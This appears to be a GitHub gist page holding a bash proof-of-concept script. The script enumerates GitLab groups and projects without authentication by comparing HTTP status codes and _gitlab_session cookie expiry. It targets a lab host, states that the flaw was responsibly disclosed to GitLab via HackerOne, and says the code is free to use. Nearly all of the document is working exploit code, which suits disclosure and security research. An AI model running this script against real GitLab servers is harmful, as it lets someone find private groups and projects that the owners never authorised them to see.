Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Unauthenticated Information Disclosure in Gitlab allows for enumeration/bruteforce of groups and projects
#!/bin/bash
# Script by TheGroundZero (@DezeStijn)
#
# https://sequr.be/blog/2020/06/gitlab-unauthenticated-group-and-project-enumeration/
# https://gist.github.com/TheGroundZero/ea067760fd6c3854238f098cb075bf96
#
# Using a difference in behaviour by Gitlab in setting cookies
# it's possible to enumerate/bruteforce groups/projects
# as an unauthenticated user.
#
# This code was written purely for a demo.
# With some reworking this could work with wordlist files
# and even be multithreaded.
#
# Responsibly disclosed to Gitlab via HackerOne on 2020-06-04
# https://hackerone.com/reports/891055
#
# Free to use, but please do refer to this original gist.
#
# https://github.com/TheGroundZero
# https://twitter.com/DezeStijn/
# https://sequr.be/ | http://sequrx53bdtvizjsbcdibrugpg7fujhvx7b75rvhwh2kq3i4hhvh35qd.onion/
#
groups="root grouppublic groupinternal groupprivate"
projects="projectpublic projectinternal projectprivate"
url="http://gitlab.lab.local"
print_exists() {
if [ $1 -eq 1 ]; then
echo -e "\e[92m[+]\e[0m $2"
else
echo -e "\e[91m[-]\e[0m $2"
fi
}
check_cookie() {
status=`curl -s -o /dev/null -w "%{http_code}" "$1"`
#echo "[i] HTTP code = $status"
if [ $status -eq 200 ]; then
print_exists 1 $1
else
expire=`curl --junk-session-cookies --cookie-jar - "$1" 2>/dev/null | awk '/_gitlab_session/ {print $5}'`
#echo "[i] Expire = $expire"
if [ $expire -gt 0 ]; then
print_exists 0 $1
else
print_exists 1 $1
fi
fi
}
for group in $groups; do
echo "[*] Group: $group"
#echo "[*] Testing: $url/$group"
check_cookie "$url/$group"
for project in $projects; do
echo "[*] Project: $project"
#echo "[*] Testing: $url/$group/$project"
check_cookie "$url/$group/$project"
done
echo ""
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment